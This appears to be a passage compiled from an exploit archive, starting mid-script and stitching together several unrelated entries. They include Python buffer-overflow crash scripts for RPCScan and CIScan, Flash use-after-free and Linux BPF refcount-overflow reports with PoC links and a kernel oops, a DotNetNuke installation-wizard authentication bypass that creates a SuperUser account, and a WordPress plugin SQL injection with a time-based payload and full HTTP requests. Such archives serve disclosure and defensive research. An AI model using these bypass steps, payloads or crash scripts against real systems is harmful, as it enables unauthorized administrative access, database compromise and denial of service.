f = open ("RPCScan-BoF.txt", "w")
f.write(buffer + eip)
f.close()
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=719
There is a use-after-free that appears to be related to rendering the display based on multiple scripts. A PoC is attached, tested on Windows only. Note the PoC is somewhat unreliable on some browsers, sometimes it needs to render a minute or two in the foreground before crashing. This is related to unreliability in the freed object being reallocated as a value that causes the crash, not unreliability in the underlying bug (it crashes immediately in a debug build of Flash). With enough effort, an attacker could likely trigger the issue immediately.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39778.zip
# Exploit Title: DotNetNuke 07.04.00 Administration Authentication Bypass
# Date: 06-05-2016
# Exploit Author: Marios Nicolaides
# Vendor Homepage: http://www.dnnsoftware.com/
# Software Link: https://dotnetnuke.codeplex.com/releases/view/611324
# Version: 07.04.00
# Tested on: Microsoft Windows 7 Professional (64-bit)
# Contact: marios.nicolaides@outlook.com
# CVE: CVE-2015-2794
# Category: webapps
1. Description
DotNetNuke 07.04.00 does not prevent anonymous users from accessing the installation wizard, as a result a remote attacker
can 'reinstall' DNN and get unauthorised access as a SuperUser.
Previous versions of DotNetNuke may also be affected.
2. Proof of Concept
The exploit can be demonstrated as follows:
If the DNN SQL database is in the default location and configuration:
- Database Type: SQL Server Express File
- Server Name: .\SQLExpress
- Filename: Database.mdf (This is the default database file of DNN. You can find it at \App_Data\Database.mdf)
The following URL will create an account with the username: 'host', password: 'dnnhost':
http://www.example.com/Install/InstallWizard.aspx?__VIEWSTATE=&culture=en-US&executeinstall
If the DNN SQL database is not in the default configuration then the attacker must know its configuration or be able to brute-force guess it.
A. Visit http://www.example.com/Install/InstallWizard.aspx?__VIEWSTATE=
B. Fill in the form and submit it:
Username: whatever
Password: whateverpassword
Email address: whatever@example.com (You will get an error msg due to client-side validation, just ignore it)
Website Name: Whatever Site Name
Database Setup Custom:
- Database Type: SQL Server Express File
- Server Name: .\SQLExpress
- This is the SQL Server instance name that we need to find or brute-force guess it in order to complete the installation.
- If MSSQL database is accessible you can use auxiliary/scanner/mssql/mssql_ping from MSF to get it.
- Filename: Database.mdf
- This is the default database file of DNN. You can find it at "\App_Data\Database.mdf".
- Tick the box Run Database as a Database Owner
C. You will probably get an error. Remove the "__VIEWSTATE=" parameter from the URL and press enter.
D. When the installation completes click Visit Website.
E. Login with your credentials.
3. Solution:
Update to version 07.04.01
https://dotnetnuke.codeplex.com/releases/view/615317
4. References:
http://www.dnnsoftware.com/platform/manage/security-center (See 2015-05 (Critical) unauthorized users may create new host accounts)
http://www.dnnsoftware.com/community-blog/cid/155198/workaround-for-potential-security-issue
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Exploit Title : CIScanv1.00 Hostname/IP Field Local BoF PoC
# Discovery by : Irving Aguilar
# Email : im.aguilar@protonmail.ch
# Discovery Date : 05.05.2016
# Software Link : http://www.mcafee.com/us/downloads/free-tools/ciscan.aspx#
# Tested Version : 1.00
# Vulnerability Type : Denial of Service (DoS) Local
# Tested on OS : Windows 7 Enterprise SP1 x64 en
#
#
# Steps to Produce the Crash:
# 1.- Run python code : python CIScanv1-BoF.py
# 2.- Open CIScanv1-BoF.txt and copy content to clipboard
# 3.- Open CIScan.exe
# 4.- Clic button Ok
# 5.- Paste Clipboard Scan > Hostname/IP
# 6.- Clic on add button (->)
# 7.- Clic button Aceptar
# 8.- Crashed
buffer = "\x41" * 388
eip = "\x42" * 4
f = open ("CIScanv1-BoF.txt", "w")
f.write(buffer + eip)
f.close()
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=809
Most things in the kernel use 32-bit reference counters, relying on the
fact that the memory constraints of real computers make it impossible to
create enough references to overflow the counters. There are exceptions
for things like `struct file` because it is possible to create references
to them with relatively little memory usage.
Using BPF_MAP_TYPE_PROG_ARRAY maps, it is possible to create
references to BPF programs that only need sizeof(void*) bytes each
(8 bytes on amd64), permitting an overflow after filling ~32GB of memory
that is subject to RLIMIT_MEMLOCK restrictions.
The requirement for more than 32GB of RAM is relatively high, but not
impossible. The requirement that the allocations need to be below
RLIMIT_MEMLOCK is probably the bigger obstacle for exploitation: On most
Linux systems, every user is only permitted to allocate up to 64KiB of RAM.
However:
- There are systems where RLIMIT_MEMLOCK is disabled administratively.
- On systems with containers (e.g. LXC containers), usually every
container's root user has access to 2^16 different UIDs. If an attacker
has control over 9 containers and can share file descriptors between
them or has control over one container with a relatively high number
of mapped UIDs, he should be able to trigger the overflow.
The attached PoC, when run in a Ubuntu 16.04 VM with 40GB RAM and the
RLIMIT_MEMLOCK limit disabled, needs 25 minutes to execute and causes the
following oops:
[ 1850.676543] BUG: unable to handle kernel paging request at ffffc900069c5010
[ 1850.676550] IP: [<ffffffff81173525>] bpf_prog_put_rcu+0x5/0x30
[ 1850.676556] PGD 9bc094067 PUD 9bc095067 PMD 9b4d2b067 PTE 0
[ 1850.676558] Oops: 0000 [#1] SMP
[ 1850.676561] Modules linked in: nls_utf8 isofs vboxsf(OE) snd_intel8x0 snd_ac97_codec ac97_bus snd_pcm snd_seq_midi snd_seq_midi_event joydev snd_rawmidi snd_seq snd_seq_device snd_timer input_leds snd serio_raw soundcore vboxvideo(OE) 8250_fintek drm i2c_piix4 vboxguest(OE) mac_hid parport_pc ppdev lp parport autofs4 hid_generic usbhid hid psmouse ahci libahci fjes video e1000 pata_acpi
[ 1850.676579] CPU: 0 PID: 1861 Comm: overflow Tainted: G OE 4.4.0-21-generic #37-Ubuntu
[ 1850.676581] Hardware name: innotek GmbH VirtualBox/VirtualBox, BIOS VirtualBox 12/01/2006
[ 1850.676582] task: ffff8809b2fe4b00 ti: ffff8809b2f3c000 task.ti: ffff8809b2f3c000
[ 1850.676583] RIP: 0010:[<ffffffff81173525>] [<ffffffff81173525>] bpf_prog_put_rcu+0x5/0x30
[ 1850.676585] RSP: 0018:ffff8809b2f3fdb8 EFLAGS: 00010286
[ 1850.676586] RAX: ffffffff81a24f20 RBX: 0000000000000000 RCX: 0000000000000001
[ 1850.676587] RDX: ffff880230ebc110 RSI: ffff880230ebc100 RDI: ffffc900069c5000
[ 1850.676588] RBP: ffff8809b2f3fdc0 R08: 0000000000000000 R09: 0000000000000000
[ 1850.676589] R10: ffff8809b55468e0 R11: ffff880230ebc110 R12: ffffc90814ce6060
[ 1850.676590] R13: ffffc90814ce6000 R14: ffff8809b5a9d1a0 R15: ffff8809b29cf480
[ 1850.676592] FS: 00007fbe54cf5700(0000) GS:ffff8809e3c00000(0000) knlGS:0000000000000000
[ 1850.676593] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b
[ 1850.676594] CR2: ffffc900069c5010 CR3: 00000009ae9ce000 CR4: 00000000000006f0
[ 1850.676598] Stack:
[ 1850.676599] ffffffff8117810e ffff8809b2f3fde8 ffffffff811783c6 ffffc90814ce6000
[ 1850.676600] 0000000000000008 ffff8809b55468e0 ffff8809b2f3fdf8 ffffffff811729bd
[ 1850.676602] ffff8809b2f3fe10 ffffffff811733b9 ffff880230ebc100 ffff8809b2f3fe58
[ 1850.676603] Call Trace:
[ 1850.676607] [<ffffffff8117810e>] ? prog_fd_array_put_ptr+0xe/0x10
[ 1850.676609] [<ffffffff811783c6>] bpf_fd_array_map_clear+0x36/0x50
[ 1850.676611] [<ffffffff811729bd>] bpf_map_put_uref+0x1d/0x20
[ 1850.676612] [<ffffffff811733b9>] bpf_map_release+0x19/0x30
[ 1850.676616] [<ffffffff8120e514>] __fput+0xe4/0x220
[ 1850.676617] [<ffffffff8120e68e>] ____fput+0xe/0x10
[ 1850.676621] [<ffffffff8109e943>] task_work_run+0x73/0x90
[ 1850.676625] [<ffffffff81083ba4>] do_exit+0x2e4/0xae0
[ 1850.676626] [<ffffffff81084423>] do_group_exit+0x43/0xb0
[ 1850.676628] [<ffffffff810844a4>] SyS_exit_group+0x14/0x20
[ 1850.676632] [<ffffffff818244f2>] entry_SYSCALL_64_fastpath+0x16/0x71
[ 1850.676633] Code: cf 00 55 48 89 e5 48 89 78 08 48 89 07 48 c7 47 08 60 55 e6 81 48 89 3d 4a 20 cf 00 5d c3 0f 1f 84 00 00 00 00 00 66 66 66 66 90 <48> 8b 47 10 3e ff 08 74 01 c3 55 48 8b 7f 10 48 c7 c6 20 2f 17
[ 1850.676649] RIP [<ffffffff81173525>] bpf_prog_put_rcu+0x5/0x30
[ 1850.676650] RSP <ffff8809b2f3fdb8>
[ 1850.676651] CR2: ffffc900069c5010
[ 1850.676653] ---[ end trace 90333448b9273067 ]---
[ 1850.676655] Fixing recursive fault but reboot is needed!
I believe that this issue illustrates that reference count hardening
makes sense, even without reference leaks.
A suggested patch (compile-tested) is attached.
Fixed in https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/kernel/bpf?id=92117d8443bc5afacc8d5ba82e541946310f106e
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39773.zip
# Exploit Title: WordPress Q and A (Focus Plus) FAQ Full Path Disclosure and SQL Injection
# Google Dork: inurl:"wp-content/plugins/q-and-a"
# Date: 12-05-2016
# Software Link: https://wordpress.org/plugins/q-and-a-focus-plus-faq/
# Version: 1.3.9.7 and prior
# Exploit Author: Gwendal Le Coguic
# Website: http://10degres.net
# Category: webapps
Create a powerful and easy to use FAQ & knowledge base on your WordPress site.
A powerful and easy to use full-featured FAQ with comments, tags and ratings for your WordPress site.
The plugin was originally named "Q and A FAQ" and developped by Raygun company
then it has been involved and renamed to "Q and A Focus Plus FAQ" by Lanexatek Creations.
##### Full Path Disclosure #####
http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/q-and-a-focus-plus.php
http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/admin/q-a-focus-plus-admin.php
http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/admin/documentation.php
http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/inc/custom-post.php
http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/inc/functions.php
http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/inc/ratings.php
http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/inc/reorder.php
http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/inc/shortcodes.php
http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/inc/upgrader.php
http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/inc/widgets.php
##### SQL Injection #####
Those vulnerabilities are mitigated by the fact that you have to be connected as an admin to exploit them.
Paramater hdnParentID is vulnerable in two places.
Payload: 0 AND (SELECT * FROM (SELECT(SLEEP(5)))zeCb)
1/ line 46: $parentsParent = $wpdb->get_row("SELECT post_parent FROM $wpdb->posts WHERE ID = " . $_POST['hdnParentID']...
POST /wp-admin/edit.php?post_type=qa_faqs&page=faqpageorder HTTP/1.1
Host: [target]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 165
btnOrderPages=Click+to+Reorder+FAQs&hdnfaqpageorder=id_8%2Cid_6%2Cid_5&btnReturnParent=Return+to+parent+page&hdnParentID=0
2/ line 254: $wpdb->get_results("SELECT * FROM $wpdb->posts WHERE post_parent = $parentID and ...
POST /wp-admin/edit.php?post_type=qa_faqs&page=faqpageorder HTTP/1.1
Host: [target]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 84
btnOrderPages=Click+to+Reorder+FAQs&hdnfaqpageorder=id_8%2Cid_6%2Cid_5&hdnParentID=0
##### References #####
https://www.owasp.org/index.php/Full_Path_Disclosure
https://www.owasp.org/index.php/SQL_Injection
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=759
There is a use-after-free in MovieClip.duplicateMovieClip.If an action associated with the MovieClip frees the clip provided as the initObject parameter to the call, it will be used after it is freed.A PoC is attached.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39779.zip